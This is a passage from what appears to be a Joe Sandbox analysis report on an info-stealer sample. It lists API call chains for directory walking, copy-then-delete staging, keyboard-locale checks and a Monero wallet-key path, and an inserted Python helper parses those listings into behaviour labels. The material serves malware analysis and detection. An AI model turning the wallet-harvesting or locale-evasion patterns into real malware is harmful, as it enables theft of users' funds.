                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: c12959f89d3e859727b256b340f39b13bd87ba66f6a073d7a9130be7c5cc3e3f
                          • Instruction ID: daf8c50fbbee7dde2974cfddf6bde6fd4dce5af52bbf2213185da11359eefa0b
                          • Opcode Fuzzy Hash: c12959f89d3e859727b256b340f39b13bd87ba66f6a073d7a9130be7c5cc3e3f
                          • Instruction Fuzzy Hash: 6F12D0719101199BDB15EB60CCAAEEE7B78BF94301F40469AB90666091FF306F8DCF91
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00560C2E), ref: 0054DE5E
                          • StrCmpCA.SHLWAPI(?,005614C8), ref: 0054DEAE
                          • StrCmpCA.SHLWAPI(?,005614CC), ref: 0054DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0054E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: 3ad2c41210ea8dfb2f26ab15b338d9dc43c798f22d15c921525246c959819eb8
                          • Instruction ID: 97cef51a226f217682985b3e982d204ecac06d4f7c317bdda5e420b4ada69505
                          • Opcode Fuzzy Hash: 3ad2c41210ea8dfb2f26ab15b338d9dc43c798f22d15c921525246c959819eb8
                          • Instruction Fuzzy Hash: D3F191718141199ADB15EB60CCA9EEE7B38BF94301F9042DBB80A62091EF346F4DCF55
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005614B0,00560C2A), ref: 0054DAEB
                          • StrCmpCA.SHLWAPI(?,005614B4), ref: 0054DB33
                          • StrCmpCA.SHLWAPI(?,005614B8), ref: 0054DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0054DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: 81a923702d91f5e7a205b85f057f43f17d84eca4077513fb123eb6a54ee38d41
                          • Instruction ID: 361af7dcf32aef6e0e1f78b9673c055ec9175f796e2a54fdafd08a1788224706
                          • Opcode Fuzzy Hash: 81a923702d91f5e7a205b85f057f43f17d84eca4077513fb123eb6a54ee38d41
                          • Instruction Fuzzy Hash: 4B916572910105A7DB14FB70DC6A9ED7B7CBBC8305F408659FD0A96185FE34AB0D8BA2
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,005605AF), ref: 00557BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00557BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00557C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00557C62
                          • LocalFree.KERNEL32(00000000), ref: 00557D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                           • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
                          • Instruction ID: 07f3c02ee3c202f723d2e26ee8da434637e3f1ba61d816f88894e493866ed38c
                          • Opcode Fuzzy Hash: 133fe03b66b05be4cfcd34f6c262daf7e539cc49579f24401a7c3cf363cd7ad5
                          • Instruction Fuzzy Hash: 7041317194011DABDB24DB94DCA9BEDBB74FF48701F2042DAE40962191DB342F89CF61
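                           The API listings above repeat two chains worth recognising on sight: a FindFirstFileA / StrCmpCA / StrCmpCA / FindNextFileA / FindClose walk (with wsprintfA building the "%s\*" mask, and in one case CopyFileA plus DeleteFileA inside the loop next to the "\Monero\wallet.keys" string), and a GetKeyboardLayoutList / GetLocaleInfoA pair, which is the locale check behind the "may stop execution after checking locale" signature. The script below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses the report's own "APIs" bullet lines, including the "Part of subcall function" entries, and maps each function's call set to a behaviour label. The behaviour table, the label names and the "." / ".." heuristic (two StrCmpCA constants four bytes apart, consistent with the 2- and 3-byte literals being laid out back to back on a 4-byte boundary) are this example's assumptions; the three sample listings are copied from the report lines above.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example)."""
import re
from dataclasses import dataclass
from typing import Optional

# One report bullet, e.g.
#   • FindFirstFileA.KERNEL32(?,?), ref: 005545BD
#   • wsprintfA.USER32 ref: 005545A6
#   • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$",
    re.IGNORECASE,
)
HEX32 = re.compile(r"^[0-9A-F]{8}$", re.IGNORECASE)

# Assumed behaviour table: label -> API names that must all appear in the function body.
BEHAVIOURS = (
    ("recursive directory walk", {"FindFirstFileA", "FindNextFileA", "FindClose"}),
    ("search mask built with wsprintf", {"wsprintfA", "FindFirstFileA"}),
    ("file staged by copy-then-delete", {"CopyFileA", "DeleteFileA"}),
    ("keyboard layout / locale check", {"GetKeyboardLayoutList", "GetLocaleInfoA"}),
    ("heap buffer via GetProcessHeap", {"GetProcessHeap", "RtlAllocateHeap"}),
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int
    subcall: Optional[int]  # callee address when the bullet is "Part of subcall function"


def parse_api_listing(text: str) -> list:
    """Parse the bullets under one "APIs" heading; lines that are not API bullets are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["name"], m["module"].upper(), args, int(m["ref"], 16), sub))
    return calls


def literal_strings(calls) -> list:
    """Argument tokens that are neither '?' (unresolved) nor 32-bit hex constants:
    the strings the sandbox resolved in place, such as \\Monero\\wallet.keys."""
    out = []
    for c in calls:
        for a in c.args:
            if a and a != "?" and not HEX32.match(a) and a not in out:
                out.append(a)
    return out


def skips_dot_dirs(body) -> bool:
    """Heuristic (assumption): consecutive StrCmpCA calls whose constant operands are
    4 bytes apart match the usual '.' / '..' skip of a directory walker. Stays False
    when the operands are far apart, as in the CopyFileA routine in the report."""
    consts = [int(c.args[1], 16) for c in body
              if c.name == "StrCmpCA" and len(c.args) == 2 and HEX32.match(c.args[1])]
    return any(b - a == 4 for a, b in zip(consts, consts[1:]))


def triage(listing: str) -> dict:
    """Summarise one function's API listing: behaviours, resolved strings, helper callees."""
    calls = parse_api_listing(listing)
    body = [c for c in calls if c.subcall is None]
    names = {c.name for c in body}
    return {
        "calls": len(calls),
        "behaviours": [label for label, needed in BEHAVIOURS if needed <= names],
        "skips_dot_dirs": skips_dot_dirs(body),
        "strings": literal_strings(calls),
        "helpers": sorted({f"{c.subcall:08X}" for c in calls if c.subcall is not None}),
    }


# Sample input, copied from the report's own API bullets above.
HEAP_WALK_LISTING = r"""
• GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
• RtlAllocateHeap.NTDLL(00000000), ref: 00554587
• wsprintfA.USER32 ref: 005545A6
• FindFirstFileA.KERNEL32(?,?), ref: 005545BD
• StrCmpCA.SHLWAPI(?,00560FC4), ref: 005545EB
• StrCmpCA.SHLWAPI(?,00560FC8), ref: 00554601
• FindNextFileA.KERNEL32(000000FF,?), ref: 0055468B
• FindClose.KERNEL32(000000FF), ref: 005546A0
• lstrcat.KERNEL32(?,0123FC20), ref: 005546C5
• lstrlen.KERNEL32(?), ref: 005546E5
"""
FILE_WALK_LISTING = r"""
  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0056510C,?,?,?,005651B4,?,?,00000000,?,00000000), ref: 00541923
• StrCmpCA.SHLWAPI(?,0056525C), ref: 00541973
• StrCmpCA.SHLWAPI(?,00565304), ref: 00541989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00541D40
• DeleteFileA.KERNEL32(00000000), ref: 00541DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00541E20
• FindClose.KERNEL32(000000FF), ref: 00541E32
  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
"""
LOCALE_LISTING = r"""
  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
• GetKeyboardLayoutList.USER32(00000000,00000000,005605AF), ref: 00557BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 00557BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 00557C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00557C62
• LocalFree.KERNEL32(00000000), ref: 00557D22
"""

if __name__ == "__main__":
    for title, listing in (("heap + walk", HEAP_WALK_LISTING),
                           ("copy/delete walk", FILE_WALK_LISTING),
                           ("locale check", LOCALE_LISTING)):
        print(title, triage(listing))
```

                           Run it against the bullets of any function block in the report; the "helpers" list gives the subcall addresses (0055A740, 0055A8A0, 0055A920, 0055A9B0) that the file-walk routines share, which is the natural place to start when you want the path-building logic rather than the walker itself.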
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "b\$09W$3tg>$6,=N$>]v~$Xg$rJOq
                          • API String ID: 0-3750414405
                          • Opcode ID: 80fe31009f0047b1ac6631fdb61053c4a2de37fe9e413d3402b4903f3af918ea
                          • Instruction ID: 9228a714ac55b966d9e6fbba49233609952b1ac9882e6e798acd8ea19a26c2a5
                          • Opcode Fuzzy Hash: 80fe31009f0047b1ac6631fdb61053c4a2de37fe9e413d3402b4903f3af918ea
                          • Instruction Fuzzy Hash: 38B21BF360C2049FE304AE2DEC8567ABBE9EFD4720F16493DEAC4C7744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: m$!)\>$%^~$(B}w$[F[{$].=$j;}
                          • API String ID: 0-1078124278
                          • Opcode ID: b46896a3566af23e9562d8511fa813e69668325130351b4f2a6e00ea9517c5a6
                          • Instruction ID: d32c28db23d4e09f71863888b361a44fc766eb4ccd354b6b816f8ccbf7738b71
                          • Opcode Fuzzy Hash: b46896a3566af23e9562d8511fa813e69668325130351b4f2a6e00ea9517c5a6
                          • Instruction Fuzzy Hash: EEB2E3F360C2049FD304AE2DEC8567AFBE9EF94720F1A493DE6C583740EA3598458697
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00560D73), ref: 0054E4A2
                          • StrCmpCA.SHLWAPI(?,005614F8), ref: 0054E4F2
                          • StrCmpCA.SHLWAPI(?,005614FC), ref: 0054E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0054EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: fcf4b5c02a7609ec2ad5cc0596d238651198824d12de54c6e0fcba03286503ee
                          • Instruction ID: 92de1f8ba9523055a40bdc1c4033d087b780ebf467ebe43ece16487fd614e6fc
                          • Opcode Fuzzy Hash: fcf4b5c02a7609ec2ad5cc0596d238651198824d12de54c6e0fcba03286503ee
                          • Instruction Fuzzy Hash: 8C1212719101199ADB14FB70DCAAEED7B38BF94301F40469AB90A56091FE346F4DCF92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Csw$Csw$WQNo$^Nw$>_c$GKq
                          • API String ID: 0-2741502615
                          • Opcode ID: 056da45c461e53fe1bb4d6deb0144f95fe8bf6e43d61d517d2ea11c397bde8c9
                          • Instruction ID: 8addd7f2ef191c2adcd6a19e9d158620b60a475bd12cf4691056dc8bd4c73ca9
                          • Opcode Fuzzy Hash: 056da45c461e53fe1bb4d6deb0144f95fe8bf6e43d61d517d2ea11c397bde8c9
                          • Instruction Fuzzy Hash: 7EB216F390C2049FE3046F29DC8567ABBE5EF94320F1A893DEAC5C7744EA3598058697
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00544EEE,00000000,?), ref: 00549B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NT,00000000,00000000), ref: 00549B2A
                          • LocalFree.KERNEL32(?,?,?,?,00544EEE,00000000,?), ref: 00549B3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
